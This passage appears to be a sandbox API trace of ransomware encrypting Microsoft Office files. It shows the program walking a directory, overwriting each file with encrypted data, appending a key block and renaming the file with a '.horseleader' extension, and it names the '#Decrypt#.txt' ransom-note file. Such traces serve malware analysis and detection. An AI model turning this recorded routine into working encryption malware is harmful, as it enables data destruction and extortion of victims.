lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.511] CloseHandle (hObject=0x15c) returned 1 [0244.511] GetProcessHeap () returned 0x780000 [0244.511] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.511] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.horseleader") returned 125 [0244.511] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.horseleader")) returned 1 [0244.511] GetProcessHeap () returned 0x780000 [0244.512] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.512] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OSETUPUI.DLL", cAlternateFileName="")) returned 1 [0244.512] lstrcmpiW (lpString1="OSETUPUI.DLL", lpString2="Windows") returned -1 [0244.512] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL") returned 109 [0244.512] StrStrIW (lpFirst="OSETUPUI.DLL", lpSrch=".horseleader") returned 0x0 [0244.512] lstrcmpW (lpString1="OSETUPUI.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.512] lstrcmpW (lpString1="OSETUPUI.DLL", lpString2="_uninstalling_.png") returned 1 [0244.512] lstrlenW (lpString=".testttjffg") returned 11 [0244.512] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 
Controller\\Office.en-us\\OSETUPUI.DLL", lpSrch=".testttjffg") returned 0x0 [0244.512] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.512] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.512] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL") returned 109 [0244.513] StrStrW (lpFirst="OSETUPUI.DLL", lpSrch=".txt") returned 0x0 [0244.513] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=191872) returned 1 [0244.513] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.513] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.516] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.516] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.517] 
SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x14ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.517] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.518] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.518] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.518] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x29d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.518] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.520] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.520] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.520] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.520] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.520] WriteFile (in: hFile=0x15c, 
lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.521] CloseHandle (hObject=0x15c) returned 1 [0244.521] GetProcessHeap () returned 0x780000 [0244.521] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.521] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL.horseleader") returned 121 [0244.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\osetupui.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OSETUPUI.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\osetupui.dll.horseleader")) returned 1 [0244.522] GetProcessHeap () returned 0x780000 [0244.522] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.522] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4804a00, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd4804a00, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x3d90, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="promointl.dll", cAlternateFileName="PROMOI~1.DLL")) returned 1 [0244.522] lstrcmpiW (lpString1="promointl.dll", lpString2="Windows") returned -1 
[0244.522] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll") returned 110 [0244.522] StrStrIW (lpFirst="promointl.dll", lpSrch=".horseleader") returned 0x0 [0244.522] lstrcmpW (lpString1="promointl.dll", lpString2="#Decrypt#.txt") returned 1 [0244.522] lstrcmpW (lpString1="promointl.dll", lpString2="_uninstalling_.png") returned 1 [0244.522] lstrlenW (lpString=".testttjffg") returned 11 [0244.522] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll", lpSrch=".testttjffg") returned 0x0 [0244.522] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.522] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.522] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\promointl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.524] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll") returned 110 [0244.524] StrStrW (lpFirst="promointl.dll", lpSrch=".txt") returned 0x0 [0244.524] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=15760) returned 1 [0244.524] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x3d90, lpOverlapped=0x0) returned 1 [0244.527] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffc270, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.527] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x3d90, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x3d90, lpOverlapped=0x0) returned 1 [0244.527] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.527] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.528] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.528] CloseHandle (hObject=0x15c) returned 1 [0244.528] GetProcessHeap () returned 0x780000 [0244.528] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.528] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll.horseleader") returned 122 [0244.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\promointl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\promointl.dll.horseleader" (normalized: 
"c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\promointl.dll.horseleader")) returned 1 [0244.529] GetProcessHeap () returned 0x780000 [0244.529] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.529] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0b6300, ftCreationTime.dwHighDateTime=0x1ca9107, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2d0b6300, ftLastWriteTime.dwHighDateTime=0x1ca9107, nFileSizeHigh=0x0, nFileSizeLow=0x9339, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="PSCONFIG.CHM", cAlternateFileName="")) returned 1 [0244.529] lstrcmpiW (lpString1="PSCONFIG.CHM", lpString2="Windows") returned -1 [0244.529] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 109 [0244.529] StrStrIW (lpFirst="PSCONFIG.CHM", lpSrch=".horseleader") returned 0x0 [0244.529] lstrcmpW (lpString1="PSCONFIG.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.529] lstrcmpW (lpString1="PSCONFIG.CHM", lpString2="_uninstalling_.png") returned 1 [0244.529] lstrlenW (lpString=".testttjffg") returned 11 [0244.529] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM", lpSrch=".testttjffg") returned 0x0 [0244.529] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.529] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.529] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.531] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM") returned 109 [0244.531] StrStrW (lpFirst="PSCONFIG.CHM", lpSrch=".txt") returned 0x0 [0244.531] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=37689) returned 1 [0244.531] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.536] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.536] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.536] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x4339, lpOverlapped=0x0) returned 1 [0244.537] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffbcc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.537] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x4339, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, 
lpNumberOfBytesWritten=0x32ae904*=0x4339, lpOverlapped=0x0) returned 1 [0244.537] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.537] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.537] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.538] CloseHandle (hObject=0x15c) returned 1 [0244.538] GetProcessHeap () returned 0x780000 [0244.538] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.538] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.horseleader") returned 121 [0244.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSCONFIG.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\psconfig.chm.horseleader")) returned 1 [0244.539] GetProcessHeap () returned 0x780000 [0244.539] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.539] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x7a8bce00, ftCreationTime.dwHighDateTime=0x1ca910f, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7a8bce00, ftLastWriteTime.dwHighDateTime=0x1ca910f, nFileSizeHigh=0x0, nFileSizeLow=0x6931, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="PSS10O.CHM", cAlternateFileName="")) returned 1 [0244.539] lstrcmpiW (lpString1="PSS10O.CHM", lpString2="Windows") returned -1 [0244.539] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 107 [0244.539] StrStrIW (lpFirst="PSS10O.CHM", lpSrch=".horseleader") returned 0x0 [0244.539] lstrcmpW (lpString1="PSS10O.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.539] lstrcmpW (lpString1="PSS10O.CHM", lpString2="_uninstalling_.png") returned 1 [0244.539] lstrlenW (lpString=".testttjffg") returned 11 [0244.539] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM", lpSrch=".testttjffg") returned 0x0 [0244.539] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.539] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.539] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.543] lstrlenW 
(lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM") returned 107 [0244.543] StrStrW (lpFirst="PSS10O.CHM", lpSrch=".txt") returned 0x0 [0244.543] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=26929) returned 1 [0244.543] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.547] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.547] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.548] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x1931, lpOverlapped=0x0) returned 1 [0244.548] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffe6cf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.548] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x1931, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x1931, lpOverlapped=0x0) returned 1 [0244.548] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.548] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.548] 
WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.549] CloseHandle (hObject=0x15c) returned 1 [0244.549] GetProcessHeap () returned 0x780000 [0244.549] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.549] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.horseleader") returned 119 [0244.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10O.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10o.chm.horseleader")) returned 1 [0244.550] GetProcessHeap () returned 0x780000 [0244.550] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.550] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7d4800, ftCreationTime.dwHighDateTime=0x1ca910f, ftLastAccessTime.dwLowDateTime=0xef00bf70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa7d4800, ftLastWriteTime.dwHighDateTime=0x1ca910f, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="PSS10R.CHM", cAlternateFileName="")) returned 1 [0244.550] lstrcmpiW (lpString1="PSS10R.CHM", lpString2="Windows") returned -1 [0244.550] 
wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 107 [0244.550] StrStrIW (lpFirst="PSS10R.CHM", lpSrch=".horseleader") returned 0x0 [0244.550] lstrcmpW (lpString1="PSS10R.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.550] lstrcmpW (lpString1="PSS10R.CHM", lpString2="_uninstalling_.png") returned 1 [0244.550] lstrlenW (lpString=".testttjffg") returned 11 [0244.550] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM", lpSrch=".testttjffg") returned 0x0 [0244.550] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.550] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.551] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common 